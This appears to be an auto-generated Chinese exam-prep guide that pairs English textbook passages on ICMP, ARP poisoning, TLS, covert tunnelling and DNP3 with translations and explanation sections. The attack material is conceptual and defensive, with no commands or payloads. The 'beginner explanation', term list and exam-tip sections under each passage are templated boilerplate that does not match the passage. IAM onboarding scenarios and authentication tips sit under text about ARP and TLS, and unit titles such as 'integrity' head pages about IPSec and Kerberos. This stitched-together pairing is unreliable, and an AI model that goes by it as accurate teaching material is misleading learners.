常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 751 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 34 / PDF P752

第 752 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Internet Control Message Protocol (ICMP) is used to determine the health of a network or a specific link. ICMP is utilized by ping, traceroute, tracert, pathping, and other network management tools. The ping utility employs ICMP echo packets and bounces them off remote systems. Thus, you can use ping to determine whether the remote system is online, whether the remote system is responding promptly, whether the intermediary systems are supporting communications, and at what level of performance efficiency the intermediary systems are communicating. The ping utility includes a redirect function that allows the echo responses to be sent to a destination different from the system of origin.

Unfortunately, the features of ICMP were often exploited in various forms of bandwidth-based denial-of-service (DoS) attacks, such as ping of death, Smurf attacks, and ping floods. This fact has shaped how networks handle ICMP traffic today, resulting in many networks limiting the use of ICMP or at least limiting its throughput rates. IGMP Internet Group Management Protocol (IGMP) allows systems to support multicasting. Multicasting is the transmission of data to multiple specific recipients. RFC 1112 discusses the requirements to perform IGMP multicasting (http://tools.ietf.org/html/rfc1112). IGMP is used to manage a host's dynamic multicast group membership.

With IGMP, a single initial signal is multiplied at the router if divergent pathways exist to the intended recipients. Multicasting can be assisted by a Trivial File Transfer Protocol (TFTP) system to host or cache content that is to be sent to multiple recipients. ARP Concerns Address Resolution Protocol (ARP) is used to resolve IP addresses (32-bit binary number for logical addressing) into MAC addresses (48-bit binary number for physical addressing). Traffic on a network segment (for example, from a client to a default gateway [i.e., a router] via a switch) is directed from its source system to its destination system using MAC addresses.

ARP is carried as the payload of an Ethernet frame and is a dependent Layer 2 protocol. ARP uses caching and broadcasting to perform its operations. The first step is to check the local ARP cache. If the needed information is already present in

中文直译 / 整理

互联网控制消息协议(ICMP)用于确定网络或特定链路的健康状况。 ICMP被 ping、traceroute、tracert、pathping以及其他网络管理工具使用。 ping工具 使用ICMP回显数据包,并将其发送到远程系统进行反弹。 因此,您可以使用 ping来确定远程系统是否在线、远程系统是否及时响应、中间系统是否支持通 信,以及中间系统通信的性能效率水平。 ping工具包含一个重定向功能,允许 将回显响应发送到与源系统不同的目标。 不幸的是,ICMP 的功能经常被用于各种基于带宽的拒绝服务(DoS)攻击, 例如死亡之 ping、Smurf 攻击和 ping 洪水。 这一事实塑造了当今网络处理 ICMP 流量的方式,导致许多网络限制 ICMP 的使用,或至少限制其吞吐速率。 IGMP 互联网组管理协议(IGMP) 允许系统支持组播。 组播 是将数据传输给多个特 定接收者的过程。 RFC 1112 讨论了执行 IGMP 组播的要求( http://tools.ietf.org/html/rfc1112)。 IGMP 用于管理主机的动态组播组成 员身份。

在 IGMP 中,如果存在通往目标接收者的不同路径,路由器会将单个 初始信号进行复制。 组播可以借助简单文件传输协议(TFTP)系统来托管或 缓存要发送给多个接收者的内容。 ARP 相关问题 地址解析协议(ARP) 用于将 IP 地址(用于逻辑寻址的 32 位二进制数)解析 为 MAC 地址(用于物理寻址的 48 位二进制数)。 网络段上的流量(例如,从 客户端到默认网关 [即路由器] 通过交换机)使用 MAC 地址从源系统定向到目 标系统。 ARP 作为以太网帧的有效载荷传输,是一种依赖于第 2 层的协议。 ARP 使用缓存和广播来执行其操作。 第一步是检查本地 ARP 缓存。 如果所需信息 已存在于

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

身份:身份是主体在系统中的标识。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 752 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

身份管理题要区分识别、认证、授权、审计。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
身份 身份是主体在系统中的标识。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 35 / PDF P753

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

the ARP cache, it is used. If not, then an ARP request in the form of a broadcast is transmitted. If the owner of the queried address is in the local subnet, it can respond with the necessary information in an ARP reply/response. If not, the system will default to using its default gateway's MAC address to transmit its communications. ARP can be abused using a technique called ARP cache poisoning, where an attacker inserts bogus information into the ARP cache. ARP cache poisoning or ARP spoofing is caused by an attacker responding with falsified replies. ARP cache is updated each time an ARP reply is received.

The dynamic content of ARP cache, whether poisoned or legitimate, will remain in cache until a timeout occurs (which is usually under 10 minutes). Once an IP-to-MAC mapping falls out of cache, then the attacker gains another opportunity to poison the ARP cache when the client reperforms the ARP broadcast query. Another form of ARP poisoning uses gratuitous ARP or unsolicited ARP replies. This occurs when a system announces its MAC-to-IP mapping without being prompted by an ARP query.

A gratuitous ARP broadcast may be sent as an announcement of a node's existence, to update an ARP mapping due to a change in IP address or MAC address, or when redundant devices are in use that share an IP address and may also share the same MAC address (regularly occurring gratuitous ARP announcements help to ensure reliable failover). A third form of ARP cache poisoning is to create static ARP entries. This is done via the ARP command and must be done locally. Unfortunately, this is easily accomplished through a malicious script executed on the client. However, static ARP entries are not persistent across reboots. The best defense against ARP-based attacks is port security on the switch.

Switch port security can prohibit communications with unknown, unauthorized, rogue devices and may be able to determine which system is responding to all ARP queries and block ARP replies from the offending system. A local or software firewall, host intrusion detection and prevention system (HIDPS), or special endpoint security products can also be used to block unrequested ARP replies/announcements. One popular tool used to detect ARP poisoning is arpwatch. Another defense is to establish static ARP entries. Yes, this can be used as both an attack/abuse and a defense. However, this is not often recommended because it removes the flexibility of a system adapting to changing network ARP

中文直译 / 整理

缓存中,则使用该信息。 如果不存在,则以广播形式发送 ARP 请求。 如果查询地址的所有者位于本地子网中,它可以通过 ARP 应答/响应提供所 需信息。 否则,系统将默认使用其默认网关的 MAC 地址来传输通信。 ARP 可以通过一种称为 ARP 缓存中毒的技术被滥用,攻击者在此技术中将 虚假信息插入 ARP 缓存。 ARP缓存中毒或ARP欺骗是由攻击者发送伪造的应答引起的。 每次收到ARP应 答时,ARP缓存都会被更新。 无论是被污染的还是合法的ARP缓存动态内容, 都会保留在缓存中,直到超时发生(通常在10分钟以内)。 一旦IP到MAC的映 射从缓存中移除,当客户端重新执行ARP广播查询时,攻击者便获得了再次污 染ARP缓存的机会。 另一种ARP欺骗形式使用免费ARP或非请求ARP应答。 当系统在未被ARP查询 请求的情况下宣布其MAC到IP的映射时,就会发生这种情况。 免费ARP广播可 能用于宣告节点的存在、因IP地址或MAC地址更改而更新ARP映射,或在使用 冗余设备共享同一IP地址并可能共享相同MAC地址时发送(定期发送的免费 ARP公告有助于确保可靠的故障切换)。 ARP缓存欺骗的第三种形式是创建静态ARP条目。

这通过ARP命令完成,且 必须在本地执行。 不幸的是,这可以通过在客户端上执行的恶意脚本轻松实 现。 然而,静态ARP条目在重启后不会保留。 针对基于ARP的攻击的最佳防御措施是交换机上的端口安全。 交换机端口安 全可以禁止与未知、未经授权或恶意设备的通信,并可能确定哪个系统响应 所有ARP查询,从而阻止来自攻击系统的ARP回复。 本地或软件防火墙、主 机入侵检测与防御系统(HIDPS)或专用端点安全产品也可用于阻止未经请 求的ARP回复/公告。 用于检测ARP欺骗的一个流行工具是arpwatch。 另一种防御方法是建立静态ARP条目。 是的,这既可以用于攻击/滥用,也可以 用于防御。 然而,这并不常被推荐,因为它剥夺了系统适应网络变化的灵活性

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

防火墙:防火墙根据规则控制网络流量进出。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

ISO 偏标准和管理体系。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
防火墙 防火墙根据规则控制网络流量进出。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
学习单元 36 / PDF P754

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

conditions, such as other devices entering and leaving the network. Once a static ARP entry is defined, it is “permanent” in that it will not be overwritten by any ARP reply, but it will not be retained across a reboot (that feature would be called persistence). A boot or logon script would need to be crafted on each system to re-create the static entries each time the system rebooted. Secure Communication Protocols Protocols that provide security services for application-specific communication channels are called secure communication protocols.

Examples include the following: IPSec Internet Protocol Security (IPSec) uses public key cryptography to provide encryption, integrity, antireplay, access control, and message origin authentication, all using IP-based protocols. The primary use of IPSec is for virtual private networks (VPNs), so IPSec can operate in either transport or tunnel mode. IPSec is a standard of IP security extensions used as an add-on for IPv4 and integrated into IPv6. IPSec is discussed further in Chapter 12. Kerberos Kerberos offers a single sign-on (SSO) solution for users and provides protection for logon credentials.

Modern implementations of Kerberos use hybrid encryption to provide reliable authentication protection. Kerberos is discussed further in Chapter 14, “Controlling and Monitoring Access.” SSH Secure Shell (SSH) is a good example of an end-to-end encryption technique. This security tool can be used to encrypt numerous plaintext utilities (such as rcp, rlogin, and rexec), serve as a protocol encrypter (such as with SFTP), and function as a transport mode VPN (i.e., host-to-host and link encryption only). SSH is discussed further in Chapter 12.

Signal Protocol This is a cryptographic protocol that provides end-to-end encryption for voice communications, videoconferencing, and text message services. The Signal Protocol is a core element in the messaging app named Signal. Secure Remote Procedure Call (S-RPC) S-RPC is an authentication service for cross-network service communications and is simply a means to prevent unauthorized execution of code on remote systems. Transport Layer Security (TLS) This is an encryption protocol that operates at OSI Layer 4 (by encrypting the payload of TCP communications).

中文直译 / 整理

条件,例如其他设备进入和离开网络。 一旦定义了静态ARP条目,它就是“永 久性”的,不会被任何ARP回复覆盖,但重启后不会保留(该功能称为持久性)。 需要在每个系统上编写启动或登录脚本,以便在每次系统重启时重新创建静态 条目。 安全通信协议 为特定应用程序通信通道提供安全服务的协议称为安全通信协议。 示 例如下: IPSec 互联网协议安全(IPSec) 使用公钥加密技术提供加密、完整性、防重 放、访问控制和消息源身份验证,所有这些均基于 IP 协议实现。 IPSec 的主要 用途是虚拟专用网络(VPN),因此 IPSec 可以在传输模式或隧道模式下运行。 IPSec 是 IP 安全扩展的标准,作为 IPv4 的附加组件使用,并集成到 IPv6 中。 IPSec 将在 第 12 章中进一步讨论。 Kerberos Kerberos 为用户提供单点登录(SSO)解决方案,并保护登录凭据。 现代 Kerberos 实现采用混合加密技术提供可靠的认证保护。 Kerberos 将在 第 14 章 “ 访问控制与监控 ” 中进一步讨论。 SSH 安全外壳(SSH) 是端到端加密技术的一个良好示例。

此安全工具可用 于加密多种明文工具(如 rcp、rlogin 和 rexec),作为协议加密器(如 SFTP),并作为传输模式 VPN(即仅主机到主机和链路加密)。 SSH 将在 第 12 章中进一步讨论。 Signal Protocol 这是一种为语音通信、视频会议和短信服务提供端到端加密 的加密协议。 Signal Protocol 是名为 Signal 的即时通讯应用的核心组件。 Secure Remote Procedure Call (S-RPC) S-RPC 是一种用于跨网络服务 通信的认证服务,其作用仅仅是防止在远程系统上执行未经授权的代码。 传输层安全协议(TLS) 这是一种在OSI第4层运行的加密协议(通过加密TCP通 信的有效载荷)。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Minimum level、mandatory requirement 常对应 standard。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
学习单元 37 / PDF P755

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

Although it is primarily known to be used to encrypt web communications as HTTPS, it can encrypt any Application Layer protocol. Transport Layer Security (TLS) replaced Secure Sockets Layer (SSL). Features of TLS include the following: Supports secure client-server communications across an insecure network while preventing tampering, spoofing, and eavesdropping. Supports one-way authentication. Supports two-way authentication using digital certificates. Often implemented as the initial payload of a TCP package, allowing it to encapsulate all higher-layer protocol payloads. Can be used to encrypt User Datagram Protocol (UDP) and Session Initiation Protocol (SIP) connections.

(SIP is a protocol associated with Voice over IP [VoIP].) Implications of Multilayer Protocols TCP/IP is a multilayer protocol. TCP/IP derives several benefits from its multilayer design, specifically in relation to its mechanism of encapsulation. For example, when communicating between a web server and a web browser over a typical network connection, HTTP is encapsulated in TCP, which in turn is encapsulated in IP, which in turn is encapsulated in Ethernet. This could be presented as follows: [ Ethernet [ IP [ TCP [ HTTP [Payload] ] ] ] ] However, this is not the extent of TCP/IP's encapsulation support. It is also possible to add additional layers of encapsulation.

For example, adding TLS encryption to the communication would insert a new encapsulation between HTTP and TCP (technically, this results in HTTPS, the TLS-encrypted form of HTTP): [ Ethernet [ IP [ TCP [ TLS [ HTTP [Payload] ] ] ] ] ] This in turn could be further encapsulated with a Network Layer encryption such as IPSec: [ Ethernet [ IPSec [ IP [ TCP [ TLS [ HTTP [Payload] ] ] ] ] ] ]

中文直译 / 整理

尽管它最广为人知的用途是加密HTTPS网络通信,但它可以加密任何应用层 协议。 传输层安全协议(TLS) 取代了 安全套接层(SSL)。 TLS的特性包括 以下内容: 支持在不安全的网络上实现安全的客户端‑服务器通信,防止篡改、伪 装和窃听。 支持单向认证。 支持使用数字证书进行双向认证。 通常作为 TCP 报文的初始负载实现,使其能够 封装所有高层协议负载。 可用于加密用户数据报协议(UDP)和会话初始协议(SIP)连接。 (SIP 是与语音 over IP [VoIP] 相关的协议。 ) 多层协议的含义 TCP/IP 是一个 多层协议。 TCP/IP 从其多层设计中获得了若干优势,特别是 与其封装机制相关。 例如,当通过典型网络连接在 Web 服务器和 Web 浏览 器之间通信时,HTTP 被封装在 TCP 中,而 TCP 又被封装在 IP 中,IP 再被 封装在以太网中。 这可以表示如下: [ 以太网 [ IP [ TCP [ HTTP [负载] ] ] ] ] 然而,这并非 TCP/IP 封装支持的全部。 还可以添加额外的封装层。

例如,在 通信中添加 TLS 加密,会在 HTTP 和 TCP 之间插入一个新的封装层(技术上, 这会形成 HTTPS,即经过 TLS 加密的 HTTP): [ 以太网 [ IP [ TCP [ TLS [ HTTP [负载] ] ] ] ] ] 这又可以进一步使用网络层加密(如 IPSec)进行封装: [ 以太网 [ IPSec [ IP [ TCP [ TLS [ HTTP [负载] ] ] ] ] ] ]

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

数字证书:数字证书把身份和公钥绑定起来,由可信 CA 签发。

TCP/IP 模型:TCP/IP 是现实网络常用协议栈,和 OSI 可对应理解。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

证书不是密钥本身,而是身份与公钥的可信绑定。

考试常让你把协议、端口、层次对应起来。

IPS 放在线路中,误报可能影响可用性。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
数字证书 数字证书把身份和公钥绑定起来,由可信 CA 签发。
TCP/IP 模型 TCP/IP 是现实网络常用协议栈,和 OSI 可对应理解。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
学习单元 38 / PDF P756

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

This is an example of a VPN. VPNs use encapsulation to enclose or tunnel one protocol inside another protocol. Usually, the encapsulation protocol encrypts the original protocol. For more on VPNs, see Chapter 12. However, encapsulation is not always implemented for benign purposes. Numerous covert channel communication mechanisms use encapsulation to hide or isolate an unauthorized protocol inside another authorized one. For example, if a network blocks the use of FTP but allows HTTP, then tools such as HTTPTunnel can be used to bypass this restriction.

This could result in an encapsulation structure such as this: [ Ethernet [ IP [ TCP [ HTTP [ FTP [Payload] ] ] ] ] ] Normally, HTTP carries its own web-related payload, but with the HTTPTunnel tool, the standard payload is replaced with an alternative protocol. This false encapsulation can even occur lower in the protocol stack. For example, ICMP is typically used for network health testing and not for general communication. However, with utilities such as Loki, ICMP is transformed into a tunnel protocol to support TCP communications.

The encapsulation structure of Loki is as follows: [ Ethernet [ IP [ ICMP [ TCP [ HTTP [Payload] ] ] ] ] ] Another area of concern caused by unbounded encapsulation support is the ability to jump between virtual local area networks (VLANs). Please see Chapter 12 about VLANs. Multilayer protocols provide the following benefits: A wide range of protocols can be used at higher layers. Encryption can be incorporated at various layers. Flexibility and resiliency in complex network structures is supported. There are a few drawbacks of multilayer protocols: Covert channels are allowed. Filters can be bypassed. Logically imposed network segment boundaries can be overstepped.

中文直译 / 整理

这是一个VPN的示例。 VPN使用封装技术将一种协议封装在另一种协议内部。 通常,封装协议会对原始协议进行加密。 有关VPN的更多信息,请参见第12章。 然而,封装并不总是用于善意目的。 许多隐蔽通道通信机制利用封装将未经授 权的协议隐藏或隔离在另一个被授权的协议之中。 例如,如果网络阻止使用 FTP 但允许 HTTP,则可以使用 HTTPTunnel 等工具绕过此限制。 这可能导 致如下封装结构: [ 以太网 [ IP [ TCP [ HTTP [ FTP [负载] ] ] ] ] ] 通常,HTTP 携带其自身的网页相关负载,但使用 HTTPTunnel 工具 时,标准负载会被替换为另一种协议。 这种虚假封装甚至可能发生在协议栈的更低层。 例如,ICMP 通常用于网 络健康检测,而非通用通信。 然而,借助 Loki 等工具,ICMP 可被转化 为隧道协议以支持 TCP 通信。 Loki 的封装结构如下: [ 以太网 [ IP [ ICMP [ TCP [ HTTP [负载] ] ] ] ] ] 由无限制的封装支持引起的另一个关注领域是能够在虚拟局域网(VLAN) 之间跳转的能力。 请参阅第12章关于VLAN的内容。

多层协议提供以下优势: 在更高层可以使用多种协议。 加密可以在多个层中实现。 支持复杂网络结构中的灵活性和弹性。 多层协议存在一些缺点: 允许使用隐蔽信道。 过滤器可以被绕过。 逻辑上强制的网络分段边界可以被超越。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

标准:标准给出必须满足的最低要求。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

ISO 偏标准和管理体系。

Minimum level、mandatory requirement 常对应 standard。

远程访问、站点到站点、安全隧道常对应 VPN/IPSec。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
标准 标准给出必须满足的最低要求。
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 39 / PDF P757

可用性:需要时能用,且性能可接受

可用性关注中断、故障、DoS、备份和冗余。

教材原文段落

DNP3 DNP3 (Distributed Network Protocol 3) is primarily used in the electric and water utility and management industries. It is used to support communications between data acquisition systems and the system control equipment. This includes substation computers, remote terminal units (RTUs) (i.e., devices controlled by an embedded microprocessor), intelligent electronic devices [IEDs], and SCADA primary stations (i.e., control centers). DNP3 is an open and public standard. It is a multilayer protocol that functions similarly to TCP/IP in that it has link, transport, and transportation layers.

For more details on DNP3, please view the protocol primer at www.dnp.org/About/Overview-of-DNP3-Protocol. Converged Protocols Converged protocols are the merging of specialty or proprietary protocols with standard protocols, such as those from the TCP/IP suite. The primary benefit of converged protocols is the ability to use existing TCP/IP supporting network infrastructure to host special or proprietary services without the need for unique deployments of alternate networking hardware.

Some common examples of converged protocols are described here: Storage Area Network (SAN) A storage area network (SAN) is a secondary network (distinct from the primary communications network) used to consolidate and manage various storage devices into a single consolidated network-accessible storage container. SANs are often used to enhance networked storage devices such as hard drives, drive arrays, optical jukeboxes, and tape libraries so that they can be made to appear to servers as if they were local storage. SANs operate by encapsulating or converging data storage signals into TCP/IP communications to separate storage and proximity.

A SAN can be a single point of failure, so redundancy needs to be integrated to provide protection of availability. In some instances, a SAN may implement deduplication to save space by not retaining multiple copies of the same file. However, this can sometimes result in data loss if the one retained original is corrupted. Internet Small Computer Systems Interface (iSCSI) Internet Small Computer Systems Interface (iSCSI) is a networking storage standard based on IP that operates at Layer 5 (Session). This technology can be used to DNP3 DNP3(

中文直译 / 整理

分布式网络协议第3版)主要应用于电力和水务公用事业及管理行 业。 它用于支持数据采集系统与系统控制设备之间的通信。 这包括变电站 计算机、远程终端单元(RTU)(即由嵌入式微处理器控制的设备)、智 能电子设备[IEDs], 和SCADA主站(即控制中心)。 DNP3是一种开放的 公共标准。 它是一种多层协议,其功能类似于TCP/IP,具有链路层、传输 层和应用层。 有关DNP3的更多详细信息,请参阅协议入门指南: www.dnp.org/About/Overview-of-DNP3-Protocol。 融合协议 融合协议 是将专用或专有协议与标准协议(如 TCP/IP 协议套件中的协议)合 并的结果。 融合协议的主要优势在于,能够利用现有的支持 TCP/IP 的网络基 础设施来托管专用或专有服务,而无需部署独立的网络硬件。 以下是几种常见 的融合协议示例: 存储区域网络(SAN) 一种存储区域网络(SAN) 是一种辅助网络(与主 通信网络不同),用于将各种存储设备整合为一个统一的、可通过网络访问的存 储容器。 SAN 常用于增强网络存储设备(如硬盘、磁盘阵列、光盘库和磁带库), 使其对服务器而言看起来如同本地存储。

SAN 通过将数据存储信号封装或融合到 TCP/IP 通信中,以分离存储与物理距离。 SAN 可能成为单点故障,因此需要集 成冗余机制以保障可用性。 在某些情况下,SAN 可能实现去重功能,通过不保留 同一文件的多个副本以节省空间。 然而,如果唯一保留的原始文件被损坏,这有 时可能导致数据丢失。 互联网小型计算机系统接口 (iSCSI) 互联网小型计算机系统接口(iSCSI) 是一 种基于 IP 的网络存储标准,工作在第 5 层(会话层)。 该技术可用于

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:可用性关注中断、故障、DoS、备份和冗余。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

可用性:可用性保证授权用户需要时能及时使用系统和数据。

标准:标准给出必须满足的最低要求。

指南:指南是建议做法,不一定强制。

TCP/IP 模型:TCP/IP 是现实网络常用协议栈,和 OSI 可对应理解。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“可用性:需要时能用,且性能可接受”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

Minimum level、mandatory requirement 常对应 standard。

Recommended、not compulsory 常对应 guideline。

考试常让你把协议、端口、层次对应起来。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
可用性 可用性保证授权用户需要时能及时使用系统和数据。
标准 标准给出必须满足的最低要求。
指南 指南是建议做法,不一定强制。
TCP/IP 模型 TCP/IP 是现实网络常用协议栈,和 OSI 可对应理解。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 40 / PDF P758

第 758 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

